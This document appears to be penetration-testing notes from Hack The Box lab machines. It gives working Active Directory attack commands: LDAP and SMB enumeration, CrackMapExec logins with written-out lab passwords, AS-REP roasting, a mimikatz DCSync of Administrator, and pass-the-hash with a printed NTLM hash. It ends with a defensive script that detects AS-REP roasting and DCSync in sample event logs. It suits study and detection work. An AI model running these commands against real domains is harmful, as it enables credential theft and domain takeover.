Windows Enumeration

To search for desktop shortcut links (.lnk) whose target or arguments use "runas /savecred" (a saved credential that any user of the shortcut can reuse):

> Get-ChildItem "C:\" *.lnk -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName | Out-File shortcuts.txt
> $sh = New-Object -ComObject WScript.Shell
> ForEach ($file in Get-Content .\shortcuts.txt) { $lnk = $sh.CreateShortcut($file); if ("$($lnk.TargetPath) $($lnk.Arguments)" -match 'runas|savecred') { Write-Output $file, $lnk.TargetPath, $lnk.Arguments } }

(Select-Object -ExpandProperty writes bare paths; ft would put a table header into shortcuts.txt. Reading the .lnk through WScript.Shell resolves the target and arguments even when the shortcut stores them as Unicode, which a plain Select-String on the file can miss.)

389/tcp open ldap Microsoft Windows Active Directory LDAP

nmap -p 389 --script ldap-rootdse -Pn 10.10.10.182

nmap -p 389 --script ldap-search -Pn 10.10.10.182

ldapsearch -x -h 10.10.10.182

ldapsearch -x -h 10.10.10.182 -s base namingcontexts

ldapsearch -x -h 10.10.10.182 -b 'dc=cascade,dc=local'

ldapsearch -x -h 10.10.10.182 -s sub -b 'dc=cascade,dc=local'

grep the output for credential-like attributes (LegacyPwd, pwd, ...)
smbclient -L \\\\10.10.10.x

smbclient \\\\10.10.10.182\\Data -U '<user>%<password>'

smb: \> recurse
smb: \> ls

Download everything (recurse and prompt are toggles, so issue each once per session):

smb: \> recurse
smb: \> prompt
smb: \> mget *

Anonymous or authenticated access check with CrackMapExec:

cme smb 10.10.10.182 -u r.thompson -p rY4n5eva

cme smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares

Get AS-REP hashes for users that do not require Kerberos pre-authentication (impacket GetNPUsers.py):

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.175

Crack the hash with john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Log in over WinRM:

ruby evil-winrm.rb -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!

DCSync the Administrator account with mimikatz (requires replication rights on the domain):

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff

Pass the hash with evil-winrm:

ruby evil-winrm.rb -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff
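The two domain techniques above (AS-REP roasting with GetNPUsers, DCSync with mimikatz) both leave distinctive traces in the domain controller's Security log. The following is an added example, not part of these notes or of any tool they mention: detection logic for both, run over constructed event records. The field names (EventID, TargetUserName, PreAuthType, TicketEncryptionType, SubjectUserName, Properties) follow the EventData of real events 4768 and 4662; the replication-right GUIDs are the well-known DS-Replication-Get-Changes values; the account names, the allow-list entry svc_aadsync and the sample events are made up for the example.

```python
"""Added example (not from the original notes): detect AS-REP roasting and
DCSync from constructed Windows Security events 4768 and 4662."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Well-known control access rights that DCSync exercises on the domain object.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# Accounts allowed to replicate besides domain controllers (machine accounts
# end in '$'). svc_aadsync is an assumed allow-list entry for this example.
KNOWN_REPLICATORS = {"svc_aadsync"}


@dataclass(frozen=True)
class Finding:
    technique: str
    account: str
    detail: str


def detect_asrep_roast(ev: Dict[str, str]) -> Optional[Finding]:
    """4768 (TGT requested) with PreAuthType 0: the KDC issued the TGT without
    pre-authentication, so the AS-REP can be cracked offline. GetNPUsers asks
    for RC4 (etype 0x17), which raises confidence when present."""
    if ev.get("EventID") != "4768" or ev.get("PreAuthType") != "0":
        return None
    etype = ev.get("TicketEncryptionType", "?")
    confidence = "high" if etype.lower() == "0x17" else "medium"
    return Finding(
        "AS-REP roasting",
        ev.get("TargetUserName", "?"),
        "TGT issued without pre-auth from %s, etype %s, confidence %s"
        % (ev.get("IpAddress", "?"), etype, confidence),
    )


def detect_dcsync(ev: Dict[str, str]) -> Optional[Finding]:
    """4662 (operation on an AD object) whose Properties list a replication
    right, performed by something other than a DC or an allow-listed account."""
    if ev.get("EventID") != "4662":
        return None
    props = ev.get("Properties", "").lower()
    used = sorted(g for g in REPL_RIGHTS if g in props)
    if not used:
        return None
    who = ev.get("SubjectUserName", "?")
    if who.endswith("$") or who in KNOWN_REPLICATORS:
        return None
    return Finding("DCSync", who, "replication rights used: " + ", ".join(used))


DETECTORS = (detect_asrep_roast, detect_dcsync)


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    """Run every detector over every event and return the findings in order."""
    findings = []
    for ev in events:
        for detector in DETECTORS:
            hit = detector(ev)
            if hit is not None:
                findings.append(hit)
    return findings


# Constructed sample events (not real log data).
BOTH_REPL_RIGHTS = "{%s}\n{%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)
SAMPLE_EVENTS = [
    # Normal TGT request: pre-auth type 2 (encrypted timestamp), AES ticket.
    {"EventID": "4768", "TargetUserName": "j.doe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.25"},
    # Roastable account: no pre-auth and RC4 requested from an unusual host.
    {"EventID": "4768", "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.200"},
    # Legitimate replication by a domain controller's machine account.
    {"EventID": "4662", "SubjectUserName": "DC01$", "Properties": BOTH_REPL_RIGHTS},
    # DCSync: an ordinary service account exercising both replication rights.
    {"EventID": "4662", "SubjectUserName": "svc_report", "Properties": BOTH_REPL_RIGHTS},
    # 4662 carrying a different, non-replication right: must not fire.
    {"EventID": "4662", "SubjectUserName": "j.doe",
     "Properties": "{00299570-246d-11d0-a768-00aa006e0529}"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print("[%s] %s: %s" % (f.technique, f.account, f.detail))
```

Two caveats when running this against real logs: 4662 only records replication rights if the domain object's SACL audits them, so confirm that audit entry exists before relying on the DCSync rule; and the 4768 rule is an alert on a symptom, the fix is to clear "Do not require Kerberos preauthentication" on the account (Set-ADAccountControl -DoesNotRequirePreAuth $false) or, where a legacy application needs it, to give that account a long random password.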
